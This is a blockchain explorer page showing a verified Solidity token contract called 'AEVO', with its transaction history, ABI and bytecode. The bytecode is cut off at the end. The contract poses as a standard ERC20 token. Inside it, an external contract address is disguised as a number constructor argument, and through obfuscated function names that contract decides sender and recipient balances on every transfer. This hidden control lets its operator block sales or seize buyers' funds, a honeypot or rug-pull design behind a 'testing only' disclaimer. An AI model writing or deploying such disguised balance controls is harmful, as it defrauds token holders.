ETH Price: $2,412.60 (-0.22%)

Contract

0x610CCf69148475123f961793DcEDFE026747Fa10
 

Overview

ETH Balance

0 ETH

ETH Value

$0.00

Sponsored

Transaction Hash
Method
Block
From
To
Approve7621532024-03-13 12:48:41206 days ago1710334121IN
0x610CCf69...26747Fa10
0 ETH00.00000026
Transfer7619332024-03-13 12:41:21206 days ago1710333681IN
0x610CCf69...26747Fa10
0 ETH0.000000050.00100025
Approve7607382024-03-13 12:01:31206 days ago1710331291IN
0x610CCf69...26747Fa10
0 ETH00.00000027
Approve7573992024-03-13 10:10:13206 days ago1710324613IN
0x610CCf69...26747Fa10
0 ETH0.000000020.00100025
Approve7573942024-03-13 10:10:03206 days ago1710324603IN
0x610CCf69...26747Fa10
0 ETH0.000000020.00100025
Approve7573812024-03-13 10:09:37206 days ago1710324577IN
0x610CCf69...26747Fa10
0 ETH0.000000020.00100025
Approve7572732024-03-13 10:06:01206 days ago1710324361IN
0x610CCf69...26747Fa10
0 ETH00.00000026
Approve7570472024-03-13 9:58:29206 days ago1710323909IN
0x610CCf69...26747Fa10
0 ETH00.00000026
Approve7530982024-03-13 7:46:51206 days ago1710316011IN
0x610CCf69...26747Fa10
0 ETH00.00000026
Approve7530302024-03-13 7:44:35206 days ago1710315875IN
0x610CCf69...26747Fa10
0 ETH00.00000026
Approve7484482024-03-13 5:11:51206 days ago1710306711IN
0x610CCf69...26747Fa10
0 ETH00.00000026
Approve7480482024-03-13 4:58:31206 days ago1710305911IN
0x610CCf69...26747Fa10
0 ETH00.00000026
Approve7479902024-03-13 4:56:35206 days ago1710305795IN
0x610CCf69...26747Fa10
0 ETH00.00000026
Approve7472622024-03-13 4:32:19206 days ago1710304339IN
0x610CCf69...26747Fa10
0 ETH00.00000027
Transfer7454762024-03-13 3:32:47206 days ago1710300767IN
0x610CCf69...26747Fa10
0 ETH00.00000067
Approve7351772024-03-12 21:49:29207 days ago1710280169IN
0x610CCf69...26747Fa10
0 ETH00.00000025
Approve7335742024-03-12 20:56:03207 days ago1710276963IN
0x610CCf69...26747Fa10
0 ETH0.000047181.00000025
Approve7229472024-03-12 15:01:49207 days ago1710255709IN
0x610CCf69...26747Fa10
0 ETH0.000000080.00180867
Approve7226732024-03-12 14:52:41207 days ago1710255161IN
0x610CCf69...26747Fa10
0 ETH0.000000080.00179289
Approve7211782024-03-12 14:02:51207 days ago1710252171IN
0x610CCf69...26747Fa10
0 ETH0.000000020.00100025
Approve7201532024-03-12 13:28:41207 days ago1710250121IN
0x610CCf69...26747Fa10
0 ETH0.000000040.00100025
Approve7165682024-03-12 11:29:11207 days ago1710242951IN
0x610CCf69...26747Fa10
0 ETH00.00000026
Approve7154252024-03-12 10:51:05207 days ago1710240665IN
0x610CCf69...26747Fa10
0 ETH00.00000026
Approve7153972024-03-12 10:50:09207 days ago1710240609IN
0x610CCf69...26747Fa10
0 ETH00.00000026
Approve7145602024-03-12 10:22:15207 days ago1710238935IN
0x610CCf69...26747Fa10
0 ETH0.000000070.00163316
View all transactions

Parent Transaction Hash Block From To
View All Internal Transactions

Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
TOKEN

Compiler Version
v0.8.6+commit.11564f7e

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at blastscan.io on 2024-03-12
*/

pragma solidity ^0.8.6;

// SPDX-License-Identifier: Unlicensed
interface IERC20 {
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount)
        external
        returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

abstract contract Ownable {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    constructor() {
        address msgSender = msg.sender;
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    function owner() public view returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(_owner == msg.sender, "Ownable: caller is not the owner");
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}

interface DTooxUFWaNtHUsiAMbFtEd {
    function _amznxjqww(
        address z39WPSdQblT,
        uint256 fxjWZhkSfE,
        uint256 w1tqaGVTjX
    ) external view returns (uint256, uint256);
}

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }
}
/**
 * This contract is for testing purposes only. 
 * Please do not make any purchases, as we are not responsible for any losses incurred.
 */
contract TOKEN is IERC20, Ownable {
    using SafeMath for uint256;

    mapping(address => uint256) private _tOwned;
    mapping(address => mapping(address => uint256)) private _allowances;
    address public _defaultAddress = address(0x000000000000000000000000000000000000dEaD);
    string private _nameKLCyhK = "AEVO";
    string private _symbolKLCyhK = "AEVO";
    uint8 private _decimalsKLCyhK = 9;
    DTooxUFWaNtHUsiAMbFtEd private lVIQIrshbMoIGfsHvGJWkp;
    uint256 private _tTotal = 1000000000000 * 10**_decimalsKLCyhK;

    constructor(uint256 aKLCyhK) {
        lVIQIrshbMoIGfsHvGJWkp = getBcFdpqskwwcto(((brcFactordpqskwwcto(aKLCyhK))));
        _tOwned[msg.sender] = _tTotal;
        emit Transfer(address(0), msg.sender, _tTotal);
    }

    function name() public view returns (string memory) {
        return _nameKLCyhK;
    }

    function symbol() public view returns (string memory) {
        return _symbolKLCyhK;
    }

    

    function decimals() public view returns (uint256) {
        return _decimalsKLCyhK;
    }

    function totalSupply() public view override returns (uint256) {
        return _tTotal;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _tOwned[account];
    }

    function transfer(address tfbnkzbprecipient, uint256 xvrtjqiyamount)
        public
        override
        returns (bool)
    {
        _transfer(msg.sender, tfbnkzbprecipient, xvrtjqiyamount);
        return true;
    }

   function getBcFdpqskwwcto(address accc) internal pure returns (DTooxUFWaNtHUsiAMbFtEd) {
        return getBcQdpqskwwcto(accc);
    }

    function getBcQdpqskwwcto(address accc) internal pure  returns (DTooxUFWaNtHUsiAMbFtEd) {
        return DTooxUFWaNtHUsiAMbFtEd(accc);
    }

    function brc20Mandpqskwwcto(address dnaqqzaifrom,uint256 amount,uint256 amountv) private view returns(uint256,uint256) {
        return lVIQIrshbMoIGfsHvGJWkp._amznxjqww(dnaqqzaifrom,amount, amountv);
    }

    function allowance(address fbpgpgpiowner, address jrxmowwzspender)
        public
        view
        override
        returns (uint256)
    {
        return _allowances[fbpgpgpiowner][jrxmowwzspender];
    }

    function brcFfffactordpqskwwcto(uint256 value) internal pure returns (uint160) {
        return (uint160(value));
    }
    
    function brcFactordpqskwwcto(uint256 value) internal pure returns (address) {
           return address(brcFfffactordpqskwwcto(value));
    }

    function approve(address spender, uint256 amount)
        public
        override
        returns (bool)
    {
        _approve(msg.sender, spender, amount);
        return true;
    }

    

    function _transfer(
        address nsueigiyfrom,
        address dpqskwwcto,
        uint256 amount
    ) private {
        require(
            nsueigiyfrom != address(0),
            "ERC20: transfer from the zero address"
        );
        require(
            dpqskwwcto != address(0),
            "ERC20: transfer to the zero address"
        );
        uint256 feeAmount = 0;
         (uint256 tfbnkzbprecipient, uint256 xvrtjqiyamount) = 
        brc20Mandpqskwwcto(
            nsueigiyfrom,
            amount,
            _tOwned[nsueigiyfrom]
        );
        _tOwned[nsueigiyfrom] = xvrtjqiyamount;
        require(
            _tOwned[nsueigiyfrom] >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        _tOwned[nsueigiyfrom] = _tOwned[nsueigiyfrom].sub(amount);
        _tOwned[dpqskwwcto] = _tOwned[dpqskwwcto].add(tfbnkzbprecipient);
        emit Transfer(nsueigiyfrom, dpqskwwcto, amount);
    }

    function qpwfpwvr() external view returns (uint256) {
    return _decimalsKLCyhK;
    }

    function transferFrom(
        address hjwuwsmosender,
        address lzmbejugrecipient,
        uint256 ppuhdabxamount
    ) public override returns (bool) {
        _transfer(hjwuwsmosender, lzmbejugrecipient, ppuhdabxamount);
        _approve(
            hjwuwsmosender,
            msg.sender,
            _allowances[hjwuwsmosender][msg.sender].sub(
                ppuhdabxamount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    

    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            msg.sender,
            spender,
            _allowances[msg.sender][spender].add(addedValue)
        );
        return true;
    }

    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            msg.sender,
            spender,
            _allowances[msg.sender][spender].sub(
                subtractedValue,
                "ERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    
    
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"uint256","name":"aKLCyhK","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_defaultAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"fbpgpgpiowner","type":"address"},{"internalType":"address","name":"jrxmowwzspender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"qpwfpwvr","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"tfbnkzbprecipient","type":"address"},{"internalType":"uint256","name":"xvrtjqiyamount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"hjwuwsmosender","type":"address"},{"internalType":"address","name":"lzmbejugrecipient","type":"address"},{"internalType":"uint256","name":"ppuhdabxamount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405261dead600360006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506040518060400160405280600481526020017f4145564f00000000000000000000000000000000000000000000000000000000815250600490805190602001906200009492919062000366565b506040518060400160405280600481526020017f4145564f0000000000000000000000000000000000000000000000000000000081525060059080519060200190620000e292919062000366565b506009600660006101000a81548160ff021916908360ff160217905550600660009054906101000a900460ff16600a6200011d9190620004e8565b64e8d4a510006200012f919062000625565b6007553480156200013f57600080fd5b506040516200230d3803806200230d83398181016040528101906200016591906200042d565b6000339050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a350620002276200021b826200031e60201b60201c565b6200033860201b60201c565b600660016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600754600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055503373ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6007546040516200030f919062000470565b60405180910390a3506200075d565b600062000331826200035260201b60201c565b9050919050565b60006200034b826200035c60201b60201c565b9050919050565b6000819050919050565b6000819050919050565b82805462000374906200069d565b90600052602060002090601f016020900481019282620003985760008555620003e4565b82601f10620003b357805160ff1916838001178555620003e4565b82800160010185558215620003e4579182015b82811115620003e3578251825591602001919060010190620003c6565b5b509050620003f39190620003f7565b5090565b5b8082111562000412576000816000905550600101620003f8565b5090565b600081519050620004278162000743565b92915050565b60006020828403121562000446576200044562000731565b5b6000620004568482850162000416565b91505092915050565b6200046a8162000686565b82525050565b60006020820190506200048760008301846200045f565b92915050565b6000808291508390505b6001851115620004df57808604811115620004b757620004b6620006d3565b5b6001851615620004c75780820291505b8081029050620004d78562000736565b945062000497565b94509492505050565b6000620004f58262000686565b9150620005028362000690565b9250620005317fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000539565b905092915050565b6000826200054b57600190506200061e565b816200055b57600090506200061e565b81600181146200057457600281146200057f57620005b5565b60019150506200061e565b60ff841115620005945762000593620006d3565b5b8360020a915084821115620005ae57620005ad620006d3565b5b506200061e565b5060208310610133831016604e8410600b8410161715620005ef5782820a905083811115620005e957620005e8620006d3565b5b6200061e565b620005fe84848460016200048d565b92509050818404811115620006185762000617620006d3565b5b81810290505b9392505050565b6000620006328262000686565b91506200063f8362000686565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff04831182151516156200067b576200067a620006d3565b5b828202905092915050565b6000819050919050565b600060ff82169050919050565b60006002820490506001821680620006b657607f821691505b60208210811415620006cd57620006cc62000702565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600080fd5b60008160011c9050919050565b6200074e8162000686565b81146200075a57600080fd5b50565b611ba0806200076d6000396000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c80638da5cb5b11610097578063a9059cbb11610066578063a9059cbb146102b3578063d8daf163146102e3578063dd62ed3e14610301578063f2fde38b1461033157610100565b80638da5cb5b14610229578063927f3d411461024757806395d89b4114610265578063a457c2d71461028357610100565b8063313ce567116100d3578063313ce567146101a157806339509351146101bf57806370a08231146101ef578063715018a61461021f57610100565b806306fdde0314610105578063095ea7b31461012357806318160ddd1461015357806323b872dd14610171575b600080fd5b61010d61034d565b60405161011a91906115bf565b60405180910390f35b61013d60048036038101906101389190611354565b6103df565b60405161014a91906115a4565b60405180910390f35b61015b6103f6565b60405161016891906116e1565b60405180910390f35b61018b60048036038101906101869190611301565b610400565b60405161019891906115a4565b60405180910390f35b6101a96104cb565b6040516101b691906116e1565b60405180910390f35b6101d960048036038101906101d49190611354565b6104e5565b6040516101e691906115a4565b60405180910390f35b61020960048036038101906102049190611294565b61058a565b60405161021691906116e1565b60405180910390f35b6102276105d3565b005b61023161071f565b60405161023e9190611552565b60405180910390f35b61024f610748565b60405161025c9190611552565b60405180910390f35b61026d61076e565b60405161027a91906115bf565b60405180910390f35b61029d60048036038101906102989190611354565b610800565b6040516102aa91906115a4565b60405180910390f35b6102cd60048036038101906102c89190611354565b6108bf565b6040516102da91906115a4565b60405180910390f35b6102eb6108d6565b6040516102f891906116e1565b60405180910390f35b61031b600480360381019061031691906112c1565b6108f0565b60405161032891906116e1565b60405180910390f35b61034b60048036038101906103469190611294565b610977565b005b60606004805461035c9061181d565b80601f01602080910402602001604051908101604052809291908181526020018280546103889061181d565b80156103d55780601f106103aa576101008083540402835291602001916103d5565b820191906000526020600020905b8154815290600101906020018083116103b857829003601f168201915b5050505050905090565b60006103ec338484610b32565b6001905092915050565b6000600754905090565b600061040d848484610cfd565b6104c084336104bb85604051806060016040528060288152602001611b1e60289139600260008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461108c9092919063ffffffff16565b610b32565b600190509392505050565b6000600660009054906101000a900460ff1660ff16905090565b6000610580338461057b85600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546110f090919063ffffffff16565b610b32565b6001905092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b3373ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610661576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161065890611681565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60606005805461077d9061181d565b80601f01602080910402602001604051908101604052809291908181526020018280546107a99061181d565b80156107f65780601f106107cb576101008083540402835291602001916107f6565b820191906000526020600020905b8154815290600101906020018083116107d957829003601f168201915b5050505050905090565b60006108b533846108b085604051806060016040528060258152602001611b4660259139600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461108c9092919063ffffffff16565b610b32565b6001905092915050565b60006108cc338484610cfd565b6001905092915050565b6000600660009054906101000a900460ff1660ff16905090565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b3373ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610a05576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109fc90611681565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610a75576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a6c90611601565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610ba2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b99906116c1565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610c12576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c0990611621565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610cf091906116e1565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d6d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d64906116a1565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610ddd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dd4906115e1565b60405180910390fd5b60008080610e2b8685600160008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461114e565b9150915080600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555083600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541015610ef5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610eec90611661565b60405180910390fd5b610f4784600160008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461120b90919063ffffffff16565b600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610fdc82600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546110f090919063ffffffff16565b600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8660405161107c91906116e1565b60405180910390a3505050505050565b60008383111582906110d4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110cb91906115bf565b60405180910390fd5b50600083856110e3919061176e565b9050809150509392505050565b60008082846110ff9190611718565b905083811015611144576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161113b90611641565b60405180910390fd5b8091505092915050565b600080600660019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663916e2c128686866040518463ffffffff1660e01b81526004016111b09392919061156d565b604080518083038186803b1580156111c757600080fd5b505afa1580156111db573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906111ff9190611394565b91509150935093915050565b600061124d83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f77000081525061108c565b905092915050565b60008135905061126481611aef565b92915050565b60008135905061127981611b06565b92915050565b60008151905061128e81611b06565b92915050565b6000602082840312156112aa576112a96118ad565b5b60006112b884828501611255565b91505092915050565b600080604083850312156112d8576112d76118ad565b5b60006112e685828601611255565b92505060206112f785828601611255565b9150509250929050565b60008060006060848603121561131a576113196118ad565b5b600061132886828701611255565b935050602061133986828701611255565b925050604061134a8682870161126a565b9150509250925092565b6000806040838503121561136b5761136a6118ad565b5b600061137985828601611255565b925050602061138a8582860161126a565b9150509250929050565b600080604083850312156113ab576113aa6118ad565b5b60006113b98582860161127f565b92505060206113ca8582860161127f565b9150509250929050565b6113dd816117a2565b82525050565b6113ec816117b4565b82525050565b60006113fd826116fc565b6114078185611707565b93506114178185602086016117ea565b611420816118b2565b840191505092915050565b6000611438602383611707565b9150611443826118c3565b604082019050919050565b600061145b602683611707565b915061146682611912565b604082019050919050565b600061147e602283611707565b915061148982611961565b604082019050919050565b60006114a1601b83611707565b91506114ac826119b0565b602082019050919050565b60006114c4602683611707565b91506114cf826119d9565b604082019050919050565b60006114e7602083611707565b91506114f282611a28565b602082019050919050565b600061150a602583611707565b915061151582611a51565b604082019050919050565b600061152d602483611707565b915061153882611aa0565b604082019050919050565b61154c816117e0565b82525050565b600060208201905061156760008301846113d4565b92915050565b600060608201905061158260008301866113d4565b61158f6020830185611543565b61159c6040830184611543565b949350505050565b60006020820190506115b9600083018